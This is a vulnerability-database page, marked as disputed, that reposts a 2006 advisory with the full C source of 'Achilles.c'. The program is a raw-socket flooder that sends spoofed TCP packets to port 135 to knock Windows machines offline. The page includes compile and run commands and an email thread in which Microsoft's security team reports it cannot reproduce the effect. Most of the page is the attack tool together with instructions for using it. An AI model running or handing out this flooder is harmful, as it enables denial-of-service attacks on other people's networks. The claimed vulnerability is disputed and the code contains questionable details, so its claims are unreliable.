WARNING! Fake news / Disputed / BOGUS

Windows XP/NT/SMB2003/2000 Denial of Service attack

2006.07.27
Risk: Low
Local: Yes
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 According to Microsoft the following tool does nothing to Windows based machines. According to my experience it does. According to the experience of 5 separate administrators it does as well. You be the judge of this. Initially this is/was a tool called bubonic.c which was modified for some IDS testing on a Cisco ASA5520 so the tool is a sort of re-post of sorts. Some of the flags were modified and more ranDUMBness introduced. The attack was done locally and remotely. Locally this is/was my setup @ home: Workstations: Windows XP Professional Pentium Centrino Laptop FreeBSD 6.1 Pentium M Laptop Solaris 10 / Sunfire 280r Networking: Cisco 2624 Cisco 3640 Cisco 2970 3Com Superstack Motorola Surfboard @ 10mb down 3mb up compiled: gcc -o achilles achilles.c (LOCAL ATTACK) ./achilles 10.10.10.4 205.205.205.255 1 1 Remotely it was sent with the same settings and the results were the same. The targets were two boxes, one on a T3 and the other set up for me on a DS3 connection in which I sent the attack from my home to both machines and the results were the same as well. I had to change the address for the attack though and spoof it from one of my websites to avoid RFC1918 filtering. Keep in mind the random() calls which I know offhand will change. Try it once, try it twice. I've gotten it to work for me every given time, two testers stated they'd gotten even odder results. Anyhow, since MS stated they found nothing they won't mind their write up being quoted on this. /* * Achilles.c version2 * Remodified Achilles Windows Attack Tool * compiled on FreeBSD 6.1, SuSE 10 * Solaris 10, NetBSD 3.0, * Proof of Concept tool that disconnects * Windows machines until the program is * stopped. Tested locally and remotely. * * linux:~ # uname -a * Linux linux 2.6.13-15.10-default #1 Fri May 12 16:27:12 UTC 2006 i386 GNU/Linux * * $ uname -a * SunOS unknown 5.10 Generic_118822-25 sun4u sparc SUNW,Sun-Fire- 280R * * -bash2-2.05b$ uname -a * FreeBSD hypnos 5.4-RELEASE-p14 FreeBSD 5.4-RELEASE-p14 #1: Thu May 11 01:34:54 CDT 2006 toor@hypnos:/usr/obj/usr/src/sys/HYPNOS i386 * * (c) 2006 J. Oquendo Genexsys.net::Infiltrated.net */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <strings.h> #include <sys/time.h> #include <sys/types.h> #include <sys/socket.h> #ifndef __USE_BSD #define __USE_BSD #endif #ifndef __FAVOR_BSD #define __FAVOR_BSD #endif #include <netinet/in_systm.h> #include <netinet/in.h> #include <netinet/ip.h> #include <netinet/tcp.h> #include <arpa/inet.h> #include <netdb.h> #ifdef LINUX #define FIX(x) htons(x) #else #define FIX(x) (x) #endif struct ip_hdr { u_int ip_hl:4, ip_v:4; u_char ip_tos; u_short ip_len; u_short ip_id; u_short ip_off; u_char ip_ttl; u_char ip_p; u_short ip_sum; u_long saddr, daddr; }; struct tcp_hdr { u_short th_sport; u_short th_dport; u_long th_seq; u_long th_syn; u_int th_x2:4, th_off:4; u_char th_flags; u_short th_win; u_short th_sum; u_short th_urp; }; struct tcpopt_hdr { u_char type; u_char len; u_short value; }; struct pseudo_hdr { u_long saddr, daddr; u_char mbz, ptcl; u_short tcpl; }; struct packet { struct ip/*_hdr*/ ip; struct tcphdr tcp; }; struct cksum { struct pseudo_hdr pseudo; struct tcphdr tcp; }; struct packet packet; struct cksum cksum; struct sockaddr_in s_in; u_short bgport, bgsize, pps; u_long radd; u_long sradd; int sock; void usage(char *progname) { fprintf(stderr, "Usage: %s <dst> <src> <size> <number>n", progname); fprintf(stderr, "dst:tDestination Addressn"); fprintf(stderr, "src:tSource Addressn"); fprintf(stderr, "size:tSize of packetn"); fprintf(stderr, "num:tpacketsnn"); exit(1); } inline u_short in_cksum(u_short *addr, int len) { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *w++; nleft -= 2; } if (nleft == 1) { *(u_char *)(&answer) = *(u_char *) w; sum += answer; } sum = (sum >> 16) + (sum & 0xF0F0); sum += (sum >> 16); answer = ~sum; return(answer); } u_long lookup(char *hostname) { struct hostent *hp; if ((hp = gethostbyname(hostname)) == NULL) { fprintf(stderr, "Could not resolve %sn", hostname); exit(1); } return *(u_long *)hp->h_addr; } void flooder(void) { struct timespec ts; int i; memset(&packet, 0, sizeof(packet)); ts.tv_sec = 0; ts.tv_nsec = 100; packet.ip.ip_hl = 5; packet.ip.ip_v = 4; packet.ip.ip_p = IPPROTO_TCP; packet.ip.ip_tos = 0xa0; packet.ip.ip_id = radd; packet.ip.ip_len = FIX(sizeof(packet)); packet.ip.ip_off = 0; packet.ip.ip_ttl = 255; packet.ip.ip_dst.s_addr = radd; packet.tcp.th_flags = 0; packet.tcp.th_win = 65535; packet.tcp.th_seq = random(); packet.tcp.th_ack = 0; packet.tcp.th_off = random(); packet.tcp.th_urp = 0; packet.tcp.th_dport = 135; cksum.pseudo.daddr = sradd; cksum.pseudo.mbz = random(); /* WATCH ME CLOSELY */ cksum.pseudo.ptcl = IPPROTO_TCP; cksum.pseudo.tcpl = random(); s_in.sin_family = AF_INET; s_in.sin_addr.s_addr = sradd; s_in.sin_port = 135; for(i=0;;++i) { if( !(i&31337) ) { packet.tcp.th_sport = 135; cksum.pseudo.saddr = packet.ip.ip_src.s_addr = sradd; packet.tcp.th_flags = random(); packet.tcp.th_ack = random(); } else { packet.tcp.th_flags = rand(); packet.tcp.th_ack = rand(); } ++packet.ip.ip_id; /*++packet.tcp.th_sport*/; ++packet.tcp.th_seq; if (!bgport) s_in.sin_port = packet.tcp.th_dport = 135; packet.ip.ip_sum = 0; packet.tcp.th_sum = 0; cksum.tcp = packet.tcp; packet.ip.ip_sum = in_cksum((void *)&packet.ip, 20); packet.tcp.th_sum = in_cksum((void *)&cksum, sizeof(cksum)); if (sendto(sock, &packet, sizeof(packet), 0, (struct sockaddr *)&s_in, sizeof(s_in)) < 0); } } int main(int argc, char *argv[]) { int on = 1; printf("Achilles.c Windows Attack Tooln"); if ((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("socket"); exit(1); } setgid(getgid()); setuid(getuid()); if (argc < 4) usage(argv[0]); if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) < 0) { perror("setsockopt"); exit(1); } srand((time(NULL) ^ getpid()) + getppid()); printf("nFinding hostn"); fflush(stdout); radd = lookup(argv[1]); bgport = atoi(argv[3]); bgsize = atoi(argv[4]); sradd = lookup(argv[2]); printf("Achilles: Before my time is done I will look down on your corpse and smile.n"); flooder(); return 0; } From: "J. Oquendo" <joquendo (at) hushmail (dot) com [email concealed]> To: Microsoft Security Response Center <secure (at) microsoft (dot) com [email concealed]> Date: Sat, 08 Jul 2006 22:16:24 -0400 This message is not encrypted, and is not digitally signed by "joquendo (at) hushmail (dot) com [email concealed]" <joquendo (at) hushmail (dot) com [email concealed]> . On Sat, 08 Jul 2006 17:47:05 -0400 Microsoft Security Response Center <secure (at) microsoft (dot) com [email concealed]> wrote: >Hello, > >I wanted to give you a brief update with regards to our status on >your >case. While I did see your post on Slashdot including snippets of >our >earlier correspondence mentioning that you have been able to repro >this >issue on multiple occasions, we unfortunately have not been >successful >in our attempts. Thanks for responding back a second time around. I saw your first email but laughed it off. I debated on whether or not to release it because I know it works. Heck I just finished telling and SHOWING my new coworkers the attack and offered an explanation of it to them. Know something... Still worked for me. I also mentioned to one coworker how you guess tested it with FreeBSD under VMWare and the thought was there could be an issue with VMWare's take on the networking stack... >We also could not identify from the provided TCPDump info any >distinct >connection attempts to port 135 that would result in a Denial of >Service. Our investigation which has included code review, review >of >the TCPDump, and attempts on reproing the issue on multiple fresh >installs of various Windows Operating Systems have all resulted in >non >confirmation. We have also not been able to identify any of the >"odder >things" that you mentioned earlier. Could be one of two things... Firstly the initial program was written to break BGP routing so I issued the destport to 179. Then I wanted to tinker with my IDS at the same time so I set it to random()... Then I set one to MSRPC so you might have gotten the random() of which the coding is still the same. Now to be even more ironic about the whole thing, the version I showed to my coworkers targeted guess what? Random ports and still shut my MS machine down at will. >If you believe there are any additional details or information >that >would better help illustrate the issue I would gladly use it to >further >the push the investigation with the engineering teams. Otherwise >I will >close the case with our current status and findings to date. One >question that I have is the target host that is exhibiting the >issue a >fresh install of the OS? You guys say you can't find anything on it, then there should be no issues with me releasing it along with mention of you guys finding no reason to be weary of the tool. I'm sure you guys might want to do some further investigation else it would look pretty ridiculous for MS not to be able to find issues while everyone else on say Bugtraq scratches their heads on MS' miscues. Instead of trying to exploit in under FreeBSD under VMWare, try it on a dedicated FreeBSD machine. Heck try it under Linux the code is portable. >My apologies for the delay since our last correspondence, but I >have >wanted to ensure that we have pursued every avenue before coming >back to >with this conclusion. No apologies needed. I kind of shrugged it off a long time ago. You guys say you can't replicate it yet I can whenever I run it. I'm just curious if others would be able to as well. So far I have had about 5 trusted sources test it conclusively. All results were the same. My qualm is that of... Do the script kiddiots need another idiotic DoS toy? Not really, but at the same time I stay shaking my head in disbelief you guys can't find nothing while I can break Windows 2000, 2003SMB, XP at will. > >Best regards, > >Adrian >Microsoft Security Response Center >-----Original Message----- >From: J. Oquendo [mailto:joquendo (at) hushmail (dot) com [email concealed]] >Sent: Tuesday, May 23, 2006 6:22 PM >To: Microsoft Security Response Center >Subject: RE: Security Vulnerability Report [6588as] > >-----BEGIN PGP SIGNED MESSAGE----- >Hash: SHA1 > >Adrian, here is a link for a two second packet dump from the BSD >machine sending out packets. http://xxx.xxx.xxx.xxx:905/ach.dump An >attachment would have been too big to send. Unsure what you guys >see but here were the flags I used when compiling and sending the >attack... > >gcc -o achilles achilles.c > >./achilles 10.1.1.2 192.168.1.2 1 1 > >The 10.1.1.2 is obviously whatever I want it to be and the 192 is >the victim host. Yes it can be sent to a remote machine as well. >Provided the remote host is not firewalled, the results are the >same. > >If your concerns are solely a "Denial of Service" via resource >flood, you're semi mistaken... While the specified MSRPC port is >exhausted, this should not stop your Windows machines from >accepting in and outbound connections. Also a Denial of Service >(via resource exhaustion) has already been covered by testing this >on a colo'd machine where my connection was a fragment of the >attacked machine. Meaning... Attacking machine was a DSL based >machine with no more than a 2MBPS attacking a T3 colo'd machine >45MBPS and again... The results were the same. Remote host stopped >all in and outbound connections until I ceased... > >There should be another concern that someone there at Microsoft >may >want to note... If I change the program to accept random settings >using SYN or URG flags, and random TCP codes, even odder things >happen. Being so many different packets are going through the >wire, >its difficult to pinpoint which is doing what. ... Anyhow that >dump >was killed after 2 seconds. A heck of a lot of packets being >pushed. > >On Tue, 23 May 2006 19:23:37 -0400 Microsoft Security Response >Center <secure (at) microsoft (dot) com [email concealed]> wrote: >>Thank you for the update with regards to your findings. We are >>still >>going through the repro stages of the case and there appears to >be >>some >>confusion over the concern. Do you happen to have a network trace >>of the >>behavior that I could work with our development teams in >reviewing >>to >>ensure that we are looking at the same concern and avoid any >>possible >>confusion on the matter? >> >> >>Thanks, >> >>Adrian >>Microsoft Security Response Center >>-----Original Message----- >>From: J. Oquendo [mailto:joquendo (at) hushmail (dot) com [email concealed]] >>Sent: Tuesday, May 23, 2006 1:13 PM >>To: Microsoft Security Response Center >>Subject: RE: Security Vulnerability Report [6588as] >> >>-----BEGIN PGP SIGNED MESSAGE----- >>Hash: SHA1 >> >>Just to inform you, I have also tested this from my home to a >>remote >>location that is colocated on a T3 connection and the result was >>the >>same. I was able to break connectivity to the machine from a >1.5mb >>DSL >>connection to a T3. The attack was halted when firewall rules >were >>in >>place. >>-----BEGIN PGP SIGNATURE----- >>Note: This signature can be verified at >>https://www.hushtools.com/verify >>Charset: UTF8 >>Version: Hush 2.5 >> >>wpwEAQECAAYFAkRzbLoACgkQVnroYexO+HLb5QP+Kh/uLH316Hpb3Gvyl1dBlqeGOo >B >>X >>/3BYWHHau0wINp7dvKKSkq1qLkaGDiXn14yqPIOTvw90mrtBQut5nebCFYRiaakui3 >6 >>t >>xQ7qv9RRll5vG7QUYGBhWIcLBzvcs+ck0ZhRjv9xJS2QsrdlOztDOpYjZggsAYF8Df >2 >>E >>IbpNHoM= >>=o8z1 >>-----END PGP SIGNATURE----- >> >> >> >> >>Concerned about your privacy? Instantly send FREE secure email, >no >>account required http://www.hushmail.com/send?l=480 >> >>Get the best prices on SSL certificates from Hushmail >>https://www.hushssl.com?l=485 >-----BEGIN PGP SIGNATURE----- >Note: This signature can be verified at >https://www.hushtools.com/verify >Charset: UTF8 >Version: Hush 2.5 > >wpwEAQECAAYFAkRztVIACgkQVnroYexO+HLGwAQApDSVKJ1E7WbZjg5M90yWIz4oFJP >M >1yQKNG0DchZ0bv//OXN3FiaHrh7S4iUO+dlSLLeHvUCIzG3+8oDHswo47miElprnhFL >i >lCNDVIKXPnBWZgMLI170AGT7htNrgtwUF4tOT24bK90Pe1XqjObqmgOMA1l3ceOmIx/ >y >oEL/Ovk= >=Gs59 >-----END PGP SIGNATURE----- > > > > >Concerned about your privacy? Instantly send FREE secure email, no >account required >http://www.hushmail.com/send?l=480 > >Get the best prices on SSL certificates from Hushmail >https://www.hushssl.com?l=485 perl -e 'print $i=pack(c5,(40*2),sqrt(7600),(unpack(c,Q)-3+1+3+3- 7),oct(104),10,oct(101));' -----BEGIN PGP SIGNATURE----- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.5 wpwEAQECAAYFAkTFGa0ACgkQVnroYexO+HLp2QP/Zj64NM76o6SJrHxC02n4B2r6DzoJ sO5d1seHzAF3zd1w7/6VQ/pjHsc1dp8avGkWIoY38CW/U8knArXhra8W//Tn1FzeiKqZ cGVM0tquO3t/3ZQzpoUR0ZX/2N9tfwVmIf0WAxrlyCQlIb9dAYOta/Rfl/vcG42g3vy9 +XOgXE8= =AOun -----END PGP SIGNATURE----- Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top